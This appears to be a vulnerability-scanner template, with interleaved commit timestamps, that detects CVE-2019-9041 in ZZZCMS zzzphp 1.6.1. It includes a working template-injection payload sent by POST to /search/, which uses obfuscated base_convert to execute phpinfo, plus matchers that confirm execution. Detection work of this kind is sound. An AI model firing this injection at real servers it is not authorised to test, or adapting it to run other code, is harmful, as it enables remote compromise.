2021-02-10 11:09:46 +00:00
id : CVE-2019-9041
info :
2022-07-26 13:45:11 +00:00
name : ZZZCMS 1.6.1 - Remote Code Execution
2021-02-10 11:09:46 +00:00
author : pikpikcu
severity : high
2022-07-26 13:45:11 +00:00
description : ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
2021-08-18 11:37:49 +00:00
reference :
2021-03-30 12:00:27 +00:00
- https://www.exploit-db.com/exploits/46454/
2022-07-26 13:45:11 +00:00
- http://www.iwantacve.cn/index.php/archives/118/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9041
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-9041
cwe-id : CWE-917
2023-07-11 19:49:27 +00:00
epss-score : 0.01127
cpe : cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.82839
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zzzcms
product : zzzphp
tags : cve,cve2019,zzzcms,rce,edb
2021-02-10 11:09:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-10 11:09:46 +00:00
- method : POST
path :
- "{{BaseURL}}/search/"
2023-07-11 19:49:27 +00:00
2021-02-10 11:09:46 +00:00
body : |
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
2023-07-11 19:49:27 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
2021-02-10 11:09:46 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-02-10 11:09:46 +00:00
words :
- "phpinfo"
- "PHP Version"
2023-07-11 19:49:27 +00:00
2021-02-10 11:09:46 +00:00
- type : status
status :
- 200